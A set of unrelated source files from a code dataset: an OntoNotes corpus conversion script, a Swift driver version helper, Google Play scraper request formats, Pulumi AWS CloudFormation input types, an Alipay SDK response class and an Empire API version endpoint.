os.makedirs(lang_dir, exist_ok=True)
print(f'Merging {len(files)} files to {full_file}')
merge_files(files, full_file)
v5_json_file = full_file.replace(f'.{version}_gold_conll', f'.{version}.jsonlines')
print(f'Converting CoNLL file {full_file} to json file {v5_json_file}')
labels, stats = convert_to_jsonlines(full_file, v5_json_file, language)
print('Labels:')
pprint(labels)
print('Statistics:')
pprint(stats)
conll12_json_file = f'{lang_dir}/{split}.{language}.conll12.jsonlines'
print(f'Applying CoNLL 12 official splits on {v5_json_file} to {conll12_json_file}')
id_file = get_resource(f'https://od.hankcs.com/research/emnlp2021/conll.cemantix.org.zip#2012/download/ids/'
f'{language}/coref/{split}.id')
filter_data(v5_json_file, conll12_json_file, id_file)
def ensure_python_points_to_python2():
exitcode, out, version = get_exitcode_stdout_stderr('python --version')
if not version:
version = out
if not version.startswith('Python 2'):
raise EnvironmentError(f'Your python command needs to be Python2, not {version.strip()}. Try:\n\n\t'
'ln -sf "$(which python2)" "$(which python)"')
def make_gold_conll(ontonotes_path, language):
ensure_python_points_to_python2()
ontonotes_path = os.path.abspath(get_resource(ontonotes_path))
to_conll = get_resource(
'https://gist.githubusercontent.com/hankcs/46b9137016c769e4b6137104daf43a92/raw/66369de6c24b5ec47696ae307591f0d72c6f3f02/ontonotes_to_conll.sh')
to_conll = os.path.abspath(to_conll)
# shutil.rmtree(os.path.join(ontonotes_path, 'conll-2012'), ignore_errors=True)
with pushd(ontonotes_path):
try:
flash(f'Converting [blue]{language}[/blue] to CoNLL format, '
f'this might take half an hour [blink][yellow]...[/yellow][/blink]')
run_cmd(f'bash {to_conll} {ontonotes_path} {language}')
flash('')
except RuntimeError as e:
flash(f'[red]Failed[/red] to convert {language} of {ontonotes_path} to CoNLL. See exceptions for detail')
raise e
def convert_jsonlines_to_IOBES(json_file, output_file=None, doc_level_offset=True, normalize_token=False):
json_file = get_resource(json_file)
if not output_file:
output_file = os.path.splitext(json_file)[0] + '.ner.tsv'
if normalize_token:
transform = NormalizeToken(PTB_TOKEN_MAPPING, 'token')
with open(json_file) as src, open(output_file, 'w', encoding='utf-8') as out:
for line in src:
doc = json.loads(line)
offset = 0
for sent, ner in zip(doc['sentences'], doc['ner']):
if normalize_token:
sent = transform({'token': sent})['token']
tags = ['O'] * len(sent)
for start, end, label in ner:
if doc_level_offset:
start -= offset
end -= offset
if start == end:
tags[start] = 'S-' + label
else:
tags[start] = 'B-' + label
for i in range(start + 1, end + 1):
tags[i] = 'I-' + label
tags[end] = 'E-' + label
offset += len(sent)
for token, tag in zip(sent, tags):
out.write(f'{token}\t{tag}\n')
out.write('\n')
def make_ner_tsv_if_necessary(json_file):
json_file = get_resource(json_file)
output_file = os.path.splitext(json_file)[0] + '.ner.tsv'
if not os.path.isfile(output_file):
convert_jsonlines_to_IOBES(json_file, output_file)
return output_file
def batch_make_ner_tsv_if_necessary(json_files):
for each in json_files:
make_ner_tsv_if_necessary(each)
def make_pos_tsv_if_necessary(json_file):
json_file = get_resource(json_file)
output_file = os.path.splitext(json_file)[0] + '.pos.tsv'
if not os.path.isfile(output_file):
make_pos_tsv(json_file, output_file)
return output_file
def make_pos_tsv(json_file, output_file):
with open(json_file) as src, open(output_file, 'w', encoding='utf-8') as out:
for line in src:
doc = json.loads(line)
for sent, pos in zip(doc['sentences'], doc['pos']):
for token, tag in zip(sent, pos):
out.write(f'{token}\t{tag}\n')
out.write('\n')
def batch_make_pos_tsv_if_necessary(json_files):
for each in json_files:
make_pos_tsv_if_necessary(each)
def make_con_txt(conll_file, output_file):
with open(output_file, 'w') as out:
for sent in read_tsv_as_sents(conll_file):
tree = []
pos_per_sent = []
for cell in sent:
if cell[0] == '#begin' or cell[0] == '#end':
continue
if len(cell) < 8:
print(cell)
filename, sentence_id, token_id, word, POS, parse, framefile, roleset, *_ = cell
parse = parse.replace('*', f'({POS} {word})')
tree.append(parse)
pos_per_sent.append(POS)
bracketed = ' '.join(tree)
out.write(bracketed)
out.write('\n')
def make_con_txt_if_necessary(json_file):
json_file = get_resource(json_file)
output_file = os.path.splitext(json_file)[0] + '.con.txt'
if not os.path.isfile(output_file):
make_con_txt(json_file, output_file)
return output_file
def batch_make_con_txt_if_necessary(json_files):
for each in json_files:
make_con_txt_if_necessary(each)
def batch_remove_empty_category_if_necessary(json_files):
for each in json_files:
src = get_resource(each)
dst = replace_ext(src, '.noempty.txt')
if not os.path.isfile(dst):
remove_all_ec(src)
def make_dep_conllx(con_txt_file, output_file, language='en'):
con_txt_file = get_resource(con_txt_file)
convert_to_dependency(con_txt_file, output_file, language=language)
def make_dep_conllx_if_necessary(con_txt_file: str, language='en'):
con_txt_file = get_resource(con_txt_file)
output_file = con_txt_file.replace('.con.txt', '.dep.conllx', 1)
if os.path.isfile(output_file):
return
make_dep_conllx(con_txt_file, output_file, language)
def batch_make_dep_conllx_if_necessary(con_txt_files, language='en'):
for each in con_txt_files:
make_dep_conllx_if_necessary(each, language)
def make_ner_json_if_necessary(json_file):
json_file = get_resource(json_file)
output_file = os.path.splitext(json_file)[0] + '.ner.jsonlines'
if not os.path.isfile(output_file):
make_ner_json(json_file, output_file)
return output_file
def batch_make_ner_json_if_necessary(json_files):
for each in json_files:
make_ner_json_if_necessary(each)
def make_ner_json(json_file, output_file):
filter_data(json_file, output_file, doc_ids_file=None, annotation='.name')
def make_srl_json_if_necessary(json_file):
json_file = get_resource(json_file)
output_file = os.path.splitext(json_file)[0] + '.srl.jsonlines'
if not os.path.isfile(output_file):
make_srl_json(json_file, output_file)
return output_file
def make_coref_json_if_necessary(json_file):
json_file = get_resource(json_file)
output_file = os.path.splitext(json_file)[0] + '.coref.jsonlines'
if not os.path.isfile(output_file):
make_coref_json(json_file, output_file)
return output_file
def batch_make_srl_json_if_necessary(json_files):
for each in json_files:
make_srl_json_if_necessary(each)
def make_srl_json(json_file, output_file):
filter_data(json_file, output_file, doc_ids_file=None, annotation='.prop')
def batch_make_coref_json_if_necessary(json_files):
for each in json_files:
make_coref_json_if_necessary(each)
def make_coref_json(json_file, output_file):
filter_data(json_file, output_file, doc_ids_file=None, annotation='.coref')
def load_raw_text(onf_file) -> List[str]:
with open(onf_file) as src:
sents = []
expect_sent = False
expect_sent_line = False
sent_parts = []
for line in src:
line = line.strip()
if line == 'Plain sentence:':
expect_sent_line = True
elif expect_sent_line:
expect_sent_line = False
expect_sent = True
continue
elif expect_sent:
if not line:
sents.append(' '.join(sent_parts))
expect_sent = False
sent_parts = []
else:
sent_parts.append(line)
return sents
def batch_load_raw_text(root: str) -> Dict[str, List[str]]:
onf_files = sorted(glob.glob(os.path.join(root, '**/*.onf'), recursive=True))
sents = dict()
for path in onf_files:
filename = path.split('annotations/')[1][:-len('.onf')]
sents[filename] = load_raw_text(path)
return sents
def make_raw_text_if_necessary(home: str):
home = get_resource(home)
jsonpath = os.path.join(home, 'text.jsonlines')
if os.path.isfile(jsonpath):
return
sents = batch_load_raw_text(home)
save_json(sents, jsonpath)
class RestoreToken(NormalizeToken):
def __init__(self, src: str, mapper: Union[str, dict] = None, dst: str = None) -> None:
if not mapper:
mapper = {
'/-': '-',
'/.': '.',
}
super().__init__(mapper, src, dst)
def __call__(self, sample: dict) -> dict:
src = sample[self.src]
src = [[self.convert(y) for y in x] for x in src]
sample[self.dst] = src
return sample
def main():
if len(sys.argv) != 3:
eprint('2 arguments required: ontonotes_path output_path')
exit(1)
ontonotes_path = sys.argv[1]
output_path = sys.argv[2]
make_ontonotes_jsonlines(ontonotes_path, output_path)
if __name__ == "__main__":
main()
|
6deca30cab8da4ee069751b87a92052f7569cdd3
|
07b0fb1bfecaf76d6176a67f0134b9ce3cc5cf69
|
/etc/get_bson_version.py
|
8db1453d0fb89bd92cf650efd063250129786399
|
[
"Apache-2.0"
] |
permissive
|
mongodb/mongo-swift-driver
|
58e26bbd6cbea6ac6cee55f1832c68ae45b9630d
|
7fe1ba14f54a0f444d78c6ab1a1ce1ee124b6a91
|
refs/heads/main
| 2023-08-28T14:40:32.927651
| 2023-04-13T18:00:02
| 2023-04-13T18:00:02
| 118,030,974
| 354
| 82
|
Apache-2.0
| 2023-08-28T23:54:19
| 2018-01-18T19:55:11
|
Swift
|
UTF-8
|
Python
| false
| false
| 207
|
py
|
get_bson_version.py
|
import json
with open('Package.resolved', 'r') as f:
data = json.load(f)
bson_data = next(d for d in data['object']['pins'] if d['package'] == 'swift-bson')
print(bson_data['state']['version'])
|
3091efdd1c2ba7f9bc5a57e74343656854d4fcec
|
bacaef23d2e3bf8da1b5a2a0b3bbd560d1ef572c
|
/google_play_scraper/constants/request.py
|
3a02aa7f81ed67c769d72b33e285ebbc3e11ec45
|
[
"MIT"
] |
permissive
|
JoMingyu/google-play-scraper
|
d86fed38bc92fb799c5a2cfe4e46ecd0418cfdd8
|
654bcc55b2ef689bc5051075f9fd4b8fae669099
|
refs/heads/master
| 2023-08-21T14:56:39.955025
| 2023-08-16T06:27:10
| 2023-08-16T06:27:10
| 190,213,255
| 604
| 167
|
MIT
| 2023-09-13T21:31:24
| 2019-06-04T14:02:11
|
Python
|
UTF-8
|
Python
| false
| false
| 4,041
|
py
|
request.py
|
from abc import ABC, abstractmethod
PLAY_STORE_BASE_URL = "https://play.google.com"
class Format(ABC):
@abstractmethod
def build(self, *args):
raise NotImplementedError
@abstractmethod
def build_body(self, *args):
raise NotImplementedError
class Formats:
class _Detail(Format):
URL_FORMAT = (
"{}/store/apps/details?id={{app_id}}&hl={{lang}}&gl={{country}}".format(
PLAY_STORE_BASE_URL
)
)
FALLBACK_URL_FORMAT = "{}/store/apps/details?id={{app_id}}&hl={{lang}}".format(
PLAY_STORE_BASE_URL
)
def build(self, app_id: str, lang: str, country: str) -> str:
return self.URL_FORMAT.format(app_id=app_id, lang=lang, country=country)
def fallback_build(self, app_id: str, lang: str) -> str:
return self.FALLBACK_URL_FORMAT.format(app_id=app_id, lang=lang)
def build_body(self, *args):
return None
class _Reviews(Format):
URL_FORMAT = (
"{}/_/PlayStoreUi/data/batchexecute?hl={{lang}}&gl={{country}}".format(
PLAY_STORE_BASE_URL
)
)
def build(self, lang: str, country: str) -> str:
return self.URL_FORMAT.format(lang=lang, country=country)
PAYLOAD_FORMAT_FOR_FIRST_PAGE = "f.req=%5B%5B%5B%22UsvDTd%22%2C%22%5Bnull%2Cnull%2C%5B2%2C{sort}%2C%5B{count}%2Cnull%2Cnull%5D%2Cnull%2C%5Bnull%2C{score}%5D%5D%2C%5B%5C%22{app_id}%5C%22%2C7%5D%5D%22%2Cnull%2C%22generic%22%5D%5D%5D"
PAYLOAD_FORMAT_FOR_PAGINATED_PAGE = "f.req=%5B%5B%5B%22UsvDTd%22%2C%22%5Bnull%2Cnull%2C%5B2%2C{sort}%2C%5B{count}%2Cnull%2C%5C%22{pagination_token}%5C%22%5D%2Cnull%2C%5Bnull%2C{score}%5D%5D%2C%5B%5C%22{app_id}%5C%22%2C7%5D%5D%22%2Cnull%2C%22generic%22%5D%5D%5D"
def build_body(
self,
app_id: str,
sort: int,
count: int,
filter_score_with: int,
pagination_token: str,
) -> bytes:
if pagination_token is not None:
result = self.PAYLOAD_FORMAT_FOR_PAGINATED_PAGE.format(
app_id=app_id,
sort=sort,
count=count,
score=filter_score_with,
pagination_token=pagination_token,
)
else:
result = self.PAYLOAD_FORMAT_FOR_FIRST_PAGE.format(
app_id=app_id, sort=sort, score=filter_score_with, count=count
)
return result.encode()
class _Permissions(Format):
URL_FORMAT = (
"{}/_/PlayStoreUi/data/batchexecute?hl={{lang}}&gl={{country}}".format(
PLAY_STORE_BASE_URL
)
)
def build(self, lang: str, country: str) -> str:
return self.URL_FORMAT.format(lang=lang, country=country)
PAYLOAD_FORMAT_FOR_PERMISSION = "f.req=%5B%5B%5B%22xdSrCf%22%2C%22%5B%5Bnull%2C%5B%5C%22{app_id}%5C%22%2C7%5D%2C%5B%5D%5D%5D%22%2Cnull%2C%221%22%5D%5D%5D"
def build_body(self, app_id: str) -> bytes:
result = self.PAYLOAD_FORMAT_FOR_PERMISSION.format(app_id=app_id)
return result.encode()
class _Searchresults(Format):
URL_FORMAT = (
"{}/store/search?q={{query}}&c=apps&hl={{lang}}&gl={{country}}".format(
PLAY_STORE_BASE_URL
)
)
FALLBACK_URL_FORMAT = "{}/store/search?q={{query}}&c=apps&hl={{lang}}".format(
PLAY_STORE_BASE_URL
)
def build(self, query: str, lang: str, country: str) -> str:
return self.URL_FORMAT.format(query=query, lang=lang, country=country)
def fallback_build(self, query: str, lang: str) -> str:
return self.FALLBACK_URL_FORMAT.format(query=query, lang=lang)
def build_body(self, *args):
return None
Detail = _Detail()
Reviews = _Reviews()
Permissions = _Permissions()
Searchresults = _Searchresults()
|
97424843efd5089a99cbcc5edb2c05c8ea308ad0
|
1742b6719b988e5519373002305e31d28b8bd691
|
/sdk/python/pulumi_aws/cloudformation/_inputs.py
|
d79d2a6e8dbcf149d97a329c899ecf540d4cea27
|
[
"MPL-2.0",
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
pulumi/pulumi-aws
|
4f7fdb4a816c5ea357cff2c2e3b613c006e49f1a
|
42b0a0abdf6c14da248da22f8c4530af06e67b98
|
refs/heads/master
| 2023-08-03T23:08:34.520280
| 2023-08-01T18:09:58
| 2023-08-01T18:09:58
| 97,484,940
| 384
| 171
|
Apache-2.0
| 2023-09-14T14:48:40
| 2017-07-17T14:20:33
|
Java
|
UTF-8
|
Python
| false
| false
| 15,618
|
py
|
_inputs.py
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import copy
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'CloudFormationTypeLoggingConfigArgs',
'StackSetAutoDeploymentArgs',
'StackSetInstanceDeploymentTargetsArgs',
'StackSetInstanceOperationPreferencesArgs',
'StackSetOperationPreferencesArgs',
]
@pulumi.input_type
class CloudFormationTypeLoggingConfigArgs:
def __init__(__self__, *,
log_group_name: pulumi.Input[str],
log_role_arn: pulumi.Input[str]):
"""
:param pulumi.Input[str] log_group_name: Name of the CloudWatch Log Group where CloudFormation sends error logging information when invoking the type's handlers.
:param pulumi.Input[str] log_role_arn: Amazon Resource Name (ARN) of the IAM Role CloudFormation assumes when sending error logging information to CloudWatch Logs.
"""
pulumi.set(__self__, "log_group_name", log_group_name)
pulumi.set(__self__, "log_role_arn", log_role_arn)
@property
@pulumi.getter(name="logGroupName")
def log_group_name(self) -> pulumi.Input[str]:
"""
Name of the CloudWatch Log Group where CloudFormation sends error logging information when invoking the type's handlers.
"""
return pulumi.get(self, "log_group_name")
@log_group_name.setter
def log_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "log_group_name", value)
@property
@pulumi.getter(name="logRoleArn")
def log_role_arn(self) -> pulumi.Input[str]:
"""
Amazon Resource Name (ARN) of the IAM Role CloudFormation assumes when sending error logging information to CloudWatch Logs.
"""
return pulumi.get(self, "log_role_arn")
@log_role_arn.setter
def log_role_arn(self, value: pulumi.Input[str]):
pulumi.set(self, "log_role_arn", value)
@pulumi.input_type
class StackSetAutoDeploymentArgs:
def __init__(__self__, *,
enabled: Optional[pulumi.Input[bool]] = None,
retain_stacks_on_account_removal: Optional[pulumi.Input[bool]] = None):
"""
:param pulumi.Input[bool] enabled: Whether or not auto-deployment is enabled.
:param pulumi.Input[bool] retain_stacks_on_account_removal: Whether or not to retain stacks when the account is removed.
"""
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if retain_stacks_on_account_removal is not None:
pulumi.set(__self__, "retain_stacks_on_account_removal", retain_stacks_on_account_removal)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Whether or not auto-deployment is enabled.
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter(name="retainStacksOnAccountRemoval")
def retain_stacks_on_account_removal(self) -> Optional[pulumi.Input[bool]]:
"""
Whether or not to retain stacks when the account is removed.
"""
return pulumi.get(self, "retain_stacks_on_account_removal")
@retain_stacks_on_account_removal.setter
def retain_stacks_on_account_removal(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "retain_stacks_on_account_removal", value)
@pulumi.input_type
class StackSetInstanceDeploymentTargetsArgs:
def __init__(__self__, *,
organizational_unit_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
:param pulumi.Input[Sequence[pulumi.Input[str]]] organizational_unit_ids: The organization root ID or organizational unit (OU) IDs to which StackSets deploys.
"""
if organizational_unit_ids is not None:
pulumi.set(__self__, "organizational_unit_ids", organizational_unit_ids)
@property
@pulumi.getter(name="organizationalUnitIds")
def organizational_unit_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The organization root ID or organizational unit (OU) IDs to which StackSets deploys.
"""
return pulumi.get(self, "organizational_unit_ids")
@organizational_unit_ids.setter
def organizational_unit_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "organizational_unit_ids", value)
@pulumi.input_type
class StackSetInstanceOperationPreferencesArgs:
def __init__(__self__, *,
failure_tolerance_count: Optional[pulumi.Input[int]] = None,
failure_tolerance_percentage: Optional[pulumi.Input[int]] = None,
max_concurrent_count: Optional[pulumi.Input[int]] = None,
max_concurrent_percentage: Optional[pulumi.Input[int]] = None,
region_concurrency_type: Optional[pulumi.Input[str]] = None,
region_orders: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
:param pulumi.Input[int] failure_tolerance_count: The number of accounts, per Region, for which this operation can fail before AWS CloudFormation stops the operation in that Region.
:param pulumi.Input[int] failure_tolerance_percentage: The percentage of accounts, per Region, for which this stack operation can fail before AWS CloudFormation stops the operation in that Region.
:param pulumi.Input[int] max_concurrent_count: The maximum number of accounts in which to perform this operation at one time.
:param pulumi.Input[int] max_concurrent_percentage: The maximum percentage of accounts in which to perform this operation at one time.
:param pulumi.Input[str] region_concurrency_type: The concurrency type of deploying StackSets operations in Regions, could be in parallel or one Region at a time. Valid values are `SEQUENTIAL` and `PARALLEL`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] region_orders: The order of the Regions in where you want to perform the stack operation.
"""
if failure_tolerance_count is not None:
pulumi.set(__self__, "failure_tolerance_count", failure_tolerance_count)
if failure_tolerance_percentage is not None:
pulumi.set(__self__, "failure_tolerance_percentage", failure_tolerance_percentage)
if max_concurrent_count is not None:
pulumi.set(__self__, "max_concurrent_count", max_concurrent_count)
if max_concurrent_percentage is not None:
pulumi.set(__self__, "max_concurrent_percentage", max_concurrent_percentage)
if region_concurrency_type is not None:
pulumi.set(__self__, "region_concurrency_type", region_concurrency_type)
if region_orders is not None:
pulumi.set(__self__, "region_orders", region_orders)
@property
@pulumi.getter(name="failureToleranceCount")
def failure_tolerance_count(self) -> Optional[pulumi.Input[int]]:
"""
The number of accounts, per Region, for which this operation can fail before AWS CloudFormation stops the operation in that Region.
"""
return pulumi.get(self, "failure_tolerance_count")
@failure_tolerance_count.setter
def failure_tolerance_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "failure_tolerance_count", value)
@property
@pulumi.getter(name="failureTolerancePercentage")
def failure_tolerance_percentage(self) -> Optional[pulumi.Input[int]]:
"""
The percentage of accounts, per Region, for which this stack operation can fail before AWS CloudFormation stops the operation in that Region.
"""
return pulumi.get(self, "failure_tolerance_percentage")
@failure_tolerance_percentage.setter
def failure_tolerance_percentage(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "failure_tolerance_percentage", value)
@property
@pulumi.getter(name="maxConcurrentCount")
def max_concurrent_count(self) -> Optional[pulumi.Input[int]]:
"""
The maximum number of accounts in which to perform this operation at one time.
"""
return pulumi.get(self, "max_concurrent_count")
@max_concurrent_count.setter
def max_concurrent_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_concurrent_count", value)
@property
@pulumi.getter(name="maxConcurrentPercentage")
def max_concurrent_percentage(self) -> Optional[pulumi.Input[int]]:
"""
The maximum percentage of accounts in which to perform this operation at one time.
"""
return pulumi.get(self, "max_concurrent_percentage")
@max_concurrent_percentage.setter
def max_concurrent_percentage(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_concurrent_percentage", value)
@property
@pulumi.getter(name="regionConcurrencyType")
def region_concurrency_type(self) -> Optional[pulumi.Input[str]]:
"""
The concurrency type of deploying StackSets operations in Regions, could be in parallel or one Region at a time. Valid values are `SEQUENTIAL` and `PARALLEL`.
"""
return pulumi.get(self, "region_concurrency_type")
@region_concurrency_type.setter
def region_concurrency_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region_concurrency_type", value)
@property
@pulumi.getter(name="regionOrders")
def region_orders(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The order of the Regions in where you want to perform the stack operation.
"""
return pulumi.get(self, "region_orders")
@region_orders.setter
def region_orders(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "region_orders", value)
@pulumi.input_type
class StackSetOperationPreferencesArgs:
def __init__(__self__, *,
failure_tolerance_count: Optional[pulumi.Input[int]] = None,
failure_tolerance_percentage: Optional[pulumi.Input[int]] = None,
max_concurrent_count: Optional[pulumi.Input[int]] = None,
max_concurrent_percentage: Optional[pulumi.Input[int]] = None,
region_concurrency_type: Optional[pulumi.Input[str]] = None,
region_orders: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
:param pulumi.Input[int] failure_tolerance_count: The number of accounts, per Region, for which this operation can fail before AWS CloudFormation stops the operation in that Region.
:param pulumi.Input[int] failure_tolerance_percentage: The percentage of accounts, per Region, for which this stack operation can fail before AWS CloudFormation stops the operation in that Region.
:param pulumi.Input[int] max_concurrent_count: The maximum number of accounts in which to perform this operation at one time.
:param pulumi.Input[int] max_concurrent_percentage: The maximum percentage of accounts in which to perform this operation at one time.
:param pulumi.Input[str] region_concurrency_type: The concurrency type of deploying StackSets operations in Regions, could be in parallel or one Region at a time.
:param pulumi.Input[Sequence[pulumi.Input[str]]] region_orders: The order of the Regions in where you want to perform the stack operation.
"""
if failure_tolerance_count is not None:
pulumi.set(__self__, "failure_tolerance_count", failure_tolerance_count)
if failure_tolerance_percentage is not None:
pulumi.set(__self__, "failure_tolerance_percentage", failure_tolerance_percentage)
if max_concurrent_count is not None:
pulumi.set(__self__, "max_concurrent_count", max_concurrent_count)
if max_concurrent_percentage is not None:
pulumi.set(__self__, "max_concurrent_percentage", max_concurrent_percentage)
if region_concurrency_type is not None:
pulumi.set(__self__, "region_concurrency_type", region_concurrency_type)
if region_orders is not None:
pulumi.set(__self__, "region_orders", region_orders)
@property
@pulumi.getter(name="failureToleranceCount")
def failure_tolerance_count(self) -> Optional[pulumi.Input[int]]:
"""
The number of accounts, per Region, for which this operation can fail before AWS CloudFormation stops the operation in that Region.
"""
return pulumi.get(self, "failure_tolerance_count")
@failure_tolerance_count.setter
def failure_tolerance_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "failure_tolerance_count", value)
@property
@pulumi.getter(name="failureTolerancePercentage")
def failure_tolerance_percentage(self) -> Optional[pulumi.Input[int]]:
"""
The percentage of accounts, per Region, for which this stack operation can fail before AWS CloudFormation stops the operation in that Region.
"""
return pulumi.get(self, "failure_tolerance_percentage")
@failure_tolerance_percentage.setter
def failure_tolerance_percentage(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "failure_tolerance_percentage", value)
@property
@pulumi.getter(name="maxConcurrentCount")
def max_concurrent_count(self) -> Optional[pulumi.Input[int]]:
"""
The maximum number of accounts in which to perform this operation at one time.
"""
return pulumi.get(self, "max_concurrent_count")
@max_concurrent_count.setter
def max_concurrent_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_concurrent_count", value)
@property
@pulumi.getter(name="maxConcurrentPercentage")
def max_concurrent_percentage(self) -> Optional[pulumi.Input[int]]:
"""
The maximum percentage of accounts in which to perform this operation at one time.
"""
return pulumi.get(self, "max_concurrent_percentage")
@max_concurrent_percentage.setter
def max_concurrent_percentage(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_concurrent_percentage", value)
@property
@pulumi.getter(name="regionConcurrencyType")
def region_concurrency_type(self) -> Optional[pulumi.Input[str]]:
"""
The concurrency type of deploying StackSets operations in Regions, could be in parallel or one Region at a time.
"""
return pulumi.get(self, "region_concurrency_type")
@region_concurrency_type.setter
def region_concurrency_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region_concurrency_type", value)
@property
@pulumi.getter(name="regionOrders")
def region_orders(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The order of the Regions in where you want to perform the stack operation.
"""
return pulumi.get(self, "region_orders")
@region_orders.setter
def region_orders(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "region_orders", value)
|
e2d8cb2569076bd76e7576c576e1904add6ac9de
|
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
|
/alipay/aop/api/response/AntMerchantOrderStoreQueryResponse.py
|
13434db198838592f5ef49211d26548a3ec1b457
|
[
"Apache-2.0"
] |
permissive
|
alipay/alipay-sdk-python-all
|
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
|
1fad300587c9e7e099747305ba9077d4cd7afde9
|
refs/heads/master
| 2023-08-27T21:35:01.778771
| 2023-08-23T07:12:26
| 2023-08-23T07:12:26
| 133,338,689
| 247
| 70
|
Apache-2.0
| 2023-04-25T04:54:02
| 2018-05-14T09:40:54
|
Python
|
UTF-8
|
Python
| false
| false
| 3,536
|
py
|
AntMerchantOrderStoreQueryResponse.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
from alipay.aop.api.domain.OrderExt import OrderExt
from alipay.aop.api.domain.StoreOrderGood import StoreOrderGood
class AntMerchantOrderStoreQueryResponse(AlipayResponse):
def __init__(self):
super(AntMerchantOrderStoreQueryResponse, self).__init__()
self._buyer_id = None
self._contact_phone = None
self._ext = None
self._goods_info_list = None
self._memo = None
self._order_id = None
self._out_biz_no = None
self._seller_id = None
self._user_name = None
@property
def buyer_id(self):
return self._buyer_id
@buyer_id.setter
def buyer_id(self, value):
self._buyer_id = value
@property
def contact_phone(self):
return self._contact_phone
@contact_phone.setter
def contact_phone(self, value):
self._contact_phone = value
@property
def ext(self):
return self._ext
@ext.setter
def ext(self, value):
if isinstance(value, list):
self._ext = list()
for i in value:
if isinstance(i, OrderExt):
self._ext.append(i)
else:
self._ext.append(OrderExt.from_alipay_dict(i))
@property
def goods_info_list(self):
return self._goods_info_list
@goods_info_list.setter
def goods_info_list(self, value):
if isinstance(value, list):
self._goods_info_list = list()
for i in value:
if isinstance(i, StoreOrderGood):
self._goods_info_list.append(i)
else:
self._goods_info_list.append(StoreOrderGood.from_alipay_dict(i))
@property
def memo(self):
return self._memo
@memo.setter
def memo(self, value):
self._memo = value
@property
def order_id(self):
return self._order_id
@order_id.setter
def order_id(self, value):
self._order_id = value
@property
def out_biz_no(self):
return self._out_biz_no
@out_biz_no.setter
def out_biz_no(self, value):
self._out_biz_no = value
@property
def seller_id(self):
return self._seller_id
@seller_id.setter
def seller_id(self, value):
self._seller_id = value
@property
def user_name(self):
return self._user_name
@user_name.setter
def user_name(self, value):
self._user_name = value
def parse_response_content(self, response_content):
response = super(AntMerchantOrderStoreQueryResponse, self).parse_response_content(response_content)
if 'buyer_id' in response:
self.buyer_id = response['buyer_id']
if 'contact_phone' in response:
self.contact_phone = response['contact_phone']
if 'ext' in response:
self.ext = response['ext']
if 'goods_info_list' in response:
self.goods_info_list = response['goods_info_list']
if 'memo' in response:
self.memo = response['memo']
if 'order_id' in response:
self.order_id = response['order_id']
if 'out_biz_no' in response:
self.out_biz_no = response['out_biz_no']
if 'seller_id' in response:
self.seller_id = response['seller_id']
if 'user_name' in response:
self.user_name = response['user_name']
|
fa4e9e3b0c04fe0af58c9e8fab2eb638af7d406c
|
1eca7ab68f713f9134549be8cff40d953d784326
|
/empire/server/api/v2/meta/meta_api.py
|
d28c66e6705549a29aab6462565d9826e3692a00
|
[
"BSD-3-Clause"
] |
permissive
|
BC-SECURITY/Empire
|
65576ac931635cded054912a02ed5d02a1b41f8d
|
5b2ad2c2e9b9f996e40c484215dfea36fefc808d
|
refs/heads/main
| 2023-09-04T05:00:52.366894
| 2023-08-27T22:08:54
| 2023-08-27T22:08:54
| 199,975,883
| 3,651
| 601
|
BSD-3-Clause
| 2023-09-08T05:50:26
| 2019-08-01T04:22:31
|
PowerShell
|
UTF-8
|
Python
| false
| false
| 858
|
py
|
meta_api.py
|
from fastapi import Depends
import empire.server.common.empire
from empire.server.api.api_router import APIRouter
from empire.server.api.jwt_auth import get_current_active_user
from empire.server.api.v2.meta.meta_dto import EmpireVersion
from empire.server.api.v2.shared_dto import BadRequestResponse, NotFoundResponse
from empire.server.server import main
listener_service = main.listenersv2
router = APIRouter(
prefix="/api/v2/meta",
tags=["meta"],
responses={
404: {"description": "Not found", "model": NotFoundResponse},
400: {"description": "Bad request", "model": BadRequestResponse},
},
dependencies=[Depends(get_current_active_user)],
)
@router.get(
"/version",
response_model=EmpireVersion,
)
async def read_empire_version():
return {"version": empire.server.common.empire.VERSION.split(" ")[0]}
|
5a05569980df2c8814c6275a15fd3979fe6846a6
|
a23a33d919d7465bbca5ce6bdac87a07e672e2b4
|
/test/test_events.py
|
b5da3dd4a32c027f6a218760c04d98857fc4b381
|
[
"MIT"
] |
permissive
|
